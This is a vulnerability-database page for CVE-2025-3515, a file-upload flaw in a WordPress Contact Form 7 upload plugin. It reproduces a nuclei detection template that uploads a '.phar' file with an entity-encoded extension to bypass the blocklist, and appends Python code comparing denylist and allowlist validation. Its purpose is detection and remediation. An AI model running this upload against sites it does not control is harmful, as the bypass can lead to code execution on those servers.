Contact Form 7 Drag and Drop Multiple File Upload - Arbitrary File Upload

Published 03 Jul 2026 13:39:16. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 39 views.

Contact Form 7 Drag and Drop Multi File Upload plugin allows arbitrary uploads up to 1.3.8.9, risking remote code execution.

Code
id: CVE-2025-3515

info:
  name: Contact Form 7 Drag and Drop Multiple File Upload - Arbitrary File Upload
  author: hnd3884
  severity: high
  description: |
    The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.3.8.9. This makes it possible for unauthenticated attackers to bypass the plugin's blacklist and upload .phar or other dangerous file types on the affected site's server, which may make remote code execution possible on the servers that are configured to handle .phar files as executable PHP scripts, particularly in default Apache+mod_php configurations where the file extension is not strictly validated before being passed to the PHP interpreter.
  impact: |
    Unauthenticated attackers can upload dangerous file types like .phar by bypassing the blacklist, potentially achieving remote code execution on servers with default Apache+mod_php configurations.
  remediation: |
    Upgrade Contact Form 7 Drag and Drop Multiple File Upload plugin to version 1.3.9.0 or later that properly validates file extensions.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-3515
    - https://plugins.trac.wordpress.org/changeset/3310153/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e1298242-61d2-495e-bae7-96b5e12bd03d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2025-3515
    cwe-id: CWE-434
    epss-score: 0.0509
    epss-percentile: 0.91316
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_contact_form_7
    publicwww-query: "wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/"
  tags: cve,cve2025,wordpress,wp,contact-form-7,file-upload,intrusive,vkev,vuln

variables:
  phar_marker: "CVE-2025-3515-{{rand_base(8)}}"
  phar_file: "{{rand_base(5)}}"

flow: |
  http('fetch_upload_name') && http('upload_file') && http('fetch_phar_file') || http('version_check')

http:
  - id: fetch_upload_name
    method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/contact/"
      - "{{BaseURL}}/contact-us/"
      - "{{BaseURL}}/submit/"
      - "{{BaseURL}}/support/"
      - "{{BaseURL}}/form/"
      - "{{BaseURL}}/get-in-touch/"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "wpcf7-drag-n-drop-file"
        internal: true

    extractors:
      - type: regex
        name: upload_name
        group: 1
        regex:
          - '<input.+?class=".+?wpcf7-drag-n-drop-file d-none.+?".+?data-name="(.+?)"'
        internal: true

      - type: regex
        name: nonce
        group: 1
        regex:
          - '"ajax_nonce":"([a-f0-9]{10,})"'
        internal: true

      - type: regex
        name: form_id
        group: 1
        regex:
          - '<input.+?class=".+?wpcf7-drag-n-drop-file d-none.+?".+?data-id="([0-9]+?)"'
        internal: true

  - id: upload_file
    method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyvcxCgWuFH6hBJi4
    body: |
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="action"

      dnd_codedropz_upload
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="type"

      drop
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="security"

      {{nonce}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="form_id"

      {{form_id}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload_name"

      {{upload_name}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload_folder"

      {{randstr}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4
      Content-Disposition: form-data; name="upload-file"; filename="{{phar_file}}.&#112;har"
      Content-Type: image/png

      {{phar_marker}}
      ------WebKitFormBoundaryyvcxCgWuFH6hBJi4--

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
        internal: true

    extractors:
      - type: json
        name: uploaded_file
        json:
          - ".data.file"
        internal: true

  - id: fetch_phar_file
    method: GET
    path:
      - "{{RootURL}}/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{uploaded_file}}"

    matchers:
      - type: word
        part: body
        words:
          - "{{phar_marker}}"

  - id: version_check
    method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Drag and Drop Multiple File Upload"
          - "Stable tag:"
        condition: and

      - type: dsl
        dsl:
          - compare_versions(version, '<= 1.3.8.9')

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "Stable tag:\\s*([0-9.]+)"
        internal: true

      - type: regex
        group: 1
        regex:
          - "Stable tag:\\s*([0-9.]+)"
# digest: 4a0a00473045022023ae7ec395fec050395d0f65f0a7a53215732d116826dbde9613db53fdfb2700022100b67fd185931f3ca8d2dd80ae870c92ebce0603ffac70258f644d287cfec13679:922c64590222798bb761d5b6d8e72950
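The root cause named in the template's description and remediation fields is extension filtering by denylist, which a differently spelled extension slips past, versus an allowlist applied after normalizing the filename. The following is an added example, not the plugin's code and not part of the template: the denylist and allowlist sets are assumptions, and the entity-encoded filename mirrors the `&#112;har` form used in the template's upload body.

```python
"""Denylist versus allowlist extension checks for an upload handler."""
import html
import os
import re

# Constructed sets (assumptions, not the plugin's real lists).
DANGEROUS_EXTS = {"php", "phtml", "php5", "phar"}
ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}


def normalize_filename(name: str) -> str:
    """Reduce a client-supplied name to what would actually be stored:
    decode HTML entities (so "&#112;har" becomes "phar"), cut at any
    null byte, drop directory components and non-portable characters."""
    name = html.unescape(name)
    name = name.split("\x00", 1)[0]
    name = os.path.basename(name.replace("\\", "/"))
    return re.sub(r"[^\w.\-]", "_", name).strip(". ")


def denylist_check(name: str) -> bool:
    """The weak pattern: compare the raw final extension against a blocklist.
    Returns True when the upload would be accepted."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext not in DANGEROUS_EXTS


def allowlist_check(name: str) -> bool:
    """The remediation pattern: normalize first, then require the final
    extension to be on the allowlist. Returns True when accepted."""
    parts = normalize_filename(name).lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXTS:
        return False
    # Apache can apply a handler to any extension segment ("a.phar.png"),
    # so an executable segment anywhere in the name is also rejected.
    return not any(p in DANGEROUS_EXTS for p in parts[1:-1])


if __name__ == "__main__":
    for candidate in ("shell.phar", "shell.&#112;har", "a.phar.png", "photo.png"):
        print(f"{candidate!r:22} denylist={denylist_check(candidate)} "
              f"allowlist={allowlist_check(candidate)}")
```

The entity-encoded name is accepted by the denylist check because the raw extension string is not in the set, while the allowlist check decodes it first and rejects it.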

Scores as of 04 Feb 2026 07:00 (current): Vulners AI Score 6.7 (medium risk); CVSS 3.1 8.1 - 9.8; EPSS 0.0509.